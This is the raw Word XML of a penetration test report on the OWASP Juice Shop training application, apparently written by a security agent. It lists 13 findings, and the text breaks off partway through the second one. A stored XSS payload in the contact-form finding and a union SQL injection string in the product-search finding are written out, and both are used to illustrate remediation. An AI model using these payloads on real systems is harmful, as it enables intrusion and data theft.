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42.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId45.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId48.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId72.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId75.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId93.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId34.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId112.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId115.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OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Juice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v19.1.1</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w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP Juice Shop v19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</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OpenHack Security Agent</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Bjoern Kimminich</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bjoern.kimminich@owasp.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21"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http://juiceshop:3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, was tested from the perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As part of the test, a total of 13 vulnerabilities were identified: 3 critical, 6 high, 4 medium, 0 low, and 0 informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| High:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4</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13</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</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r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">13</w:t>
            </w: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bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="scope"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scope for the assessment was the following targets:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="methodology"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security penetration test of the OWASP Juice Shop v19.1.1 took place on 2026-02-27.</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Stored XSS in Contact Form - Comment Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection in Product Search Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CORS Misconfiguration - Wildcard Allow-Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sensitive Configuration Exposure - Admin Configuration Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Information Disclosure via Verbose Error Messages and Stack Traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Directory Listing and Sensitive File Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT None Algorithm Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Weak Admin Credentials - Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Direct Object Reference (IDOR) on Basket Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password Hash Disclosure in JWT Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOM-based XSS in Search Query Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Business Logic Flaw - Race Condition in Checkout Allowing Duplicate Orders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XML External Entity (XXE) Injection via File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="141" w:name="findings-and-remediation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings and Remediation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="38" w:name="finding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="Xb9c864cb879c51ac1ad766b2898a27e1ffead16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stored XSS in Contact Form - Comment Field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8.8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId33">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://juiceshop:3000/#/contact, http://juiceshop:3000/#/administration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A stored XSS vulnerability exists in the contact form’s comment field. When a user submits a contact form with a malicious payload in the comment field, the payload is stored and executed when viewed by administrators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The contact form at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/#/contact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accepts user input for the comment field without proper sanitization. When the payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is submitted, it is stored in the database and executed when viewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to the contact form at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/#/contact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Fill in required fields (author name and rating)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. In the comment field, enter:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Submit the form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. When an administrator views the feedback, the JavaScript executes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Session hijacking via document.cookie theft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Privilege escalation through admin actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Defacement of admin dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Keylogging and credential theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">User-supplied input is stored without adequate HTML sanitization and later rendered without proper output encoding.</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Implement proper output encoding for all user-supplied content. Use a library like DOMPurify to sanitize HTML content before rendering. Apply Content Security Policy (CSP) headers to restrict inline script execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Contact form with CAPTCHA showing feedback submission interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Contact form with CAPTCHA showing feedback submission interface" title="" id="35" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-bc100e17-9018-4fad-b778-a4b41e49afa8-20-xss-contact-form-1740657001.png" id="36" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>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Contact form with CAPTCHA showing feedback submission interface</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="54" w:name="finding-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="53" w:name="sql-injection-in-product-search-endpoint"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection in Product Search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9">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http://juiceshop:3000/rest/products/search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product search endpoint at /rest/products/search?q= is vulnerable to SQL injection. An attacker can inject malicious SQL code into the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parameter to extract database information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The search functionality directly concatenates user input into a SQL query without proper sanitization or parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Exploitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Union-based SQL injection allows extraction of database metadata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Using ’ UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master– reveals table schemas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Extracted sensitive table names: Users, Products, BasketItems, Feedbacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Database confirmed as SQLite via version extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Unauthorized data exfiltration from entire database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Authentication bypass potential</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
